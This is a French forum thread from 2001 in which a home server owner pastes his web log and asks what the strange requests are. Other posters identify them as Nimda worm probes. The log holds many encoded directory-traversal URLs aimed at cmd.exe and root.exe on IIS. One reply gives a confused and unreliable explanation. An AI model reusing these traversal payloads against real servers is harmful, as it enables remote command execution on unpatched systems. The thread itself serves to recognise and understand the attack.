Des choses bizzard dans le fichier log d'un serveur Web ??

Des choses bizzard dans le fichier log d'un serveur Web ?? - Windows & Software

Marsh Posté le 12-11-2001 à 21:14:11    

Voila ce que j'ai pu lire dans fichier log
ca veut dire quoi ? quelqu'un de pas tres intensionné ??
 
 
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:59 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..%2f..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:58 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..%5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:57 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..S5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:56 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..S5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:52 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..Á?..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:51 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..À¯..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:47 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:45 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 463 "" ""
Error reading "D:\HTTPD\monsite\scripts\..Á..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié n'est pas valide.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:43 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 463 "" ""
Error reading "D:\HTTPD\monsite\msadc\..%5c..\..%5c..\..%
5c\..Á..\..Á..\..Á..\winnt\system32\cmd.e
xe" - Le chemin d'accès spécifié n'est pas valide.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:41 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\_mem_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:36 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\_vti_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:35 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..%5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:31 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\d\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:30 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\c\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:29 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\MSADC\root.exe" - Le chemin d'accès spécifié est introuvable.  
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:28 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 382 "" ""
 
Merci de vos commentaires et remarques
Salutations


---------------
Les logiciels ne font gagner du temps que lorsque l'on les maitrise parfaitement !!
Reply

Marsh Posté le 12-11-2001 à 21:14:11   

Reply

Marsh Posté le 12-11-2001 à 21:33:41    

La ya un type qui a du envoyer un leech et a voulu se connecter a un ftp visiblement il a reussi mais il vouler acceder a un rep qui n'xiste pas

Reply

Marsh Posté le 12-11-2001 à 21:36:10    

>GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" >404 382 "" ""  
>Error reading "D:\HTTPD\monsite\scripts\..%
2f..\winnt\system32>\cmd.exe"  
 
Il s'agit tous simplement d'une attaque liée au ver NIMBA.
Si ton serveur est IIs de crosoft et qu'il est pas a jours  alors tu a de grande chance d'avoir été infecté par cette attaques.


---------------
APB
Reply

Marsh Posté le 12-11-2001 à 21:40:25    

j'heberge mon propre site avec omnihttpd
y a un risque d'infection ?
je vois qu'il cherche des rep et des commandes NT , donc je pense qu'il y a pas de pb  
Mais bon votre avis ?


---------------
Les logiciels ne font gagner du temps que lorsque l'on les maitrise parfaitement !!
Reply

Marsh Posté le 12-11-2001 à 21:44:21    

j'ai donc été victime de plusieurs attaque en quelques jour :-(
dans le log , y a les IP , ca veut dire que les machines dont proviennent l'attaque sont infectées ? comment les prevenirs ?
:-(


---------------
Les logiciels ne font gagner du temps que lorsque l'on les maitrise parfaitement !!
Reply

Marsh Posté le 12-11-2001 à 21:45:34    

Si je reste sur omnihttpd , je risque pas d'attaque de ce genre alors ?
Moi qui voulais faire un essai , je vous que le net , c'est la jungle :-( vais pas rester vivant longtemps moi
je vais pas mettre le serveur en permanence alors ?
merci de vos remarques et commentaires


---------------
Les logiciels ne font gagner du temps que lorsque l'on les maitrise parfaitement !!
Reply

Marsh Posté le 12-11-2001 à 21:54:25    

Moi en 3 semaine j'en suis deja a plus de 10000 (dix mille)attaques.


---------------
APB
Reply

Marsh Posté le 12-11-2001 à 21:56:17    

le_pacifa a écrit a écrit :

Moi en 3 semaine j'en suis deja a plus de 10000 (dix mille)attaques.  




 
 :lol:  :lol:  :lol:

Reply

Marsh Posté le 12-11-2001 à 21:58:20    

C pas drole sa fait gonfler les logs de appache.


---------------
APB
Reply

Marsh Posté le 12-11-2001 à 21:59:43    

lol moi je croyais qu'on essayait tout simplement de me nicker avec un attaque netbios ou un truc de ce genre ( nbtstat .....)


---------------
Les logiciels ne font gagner du temps que lorsque l'on les maitrise parfaitement !!
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed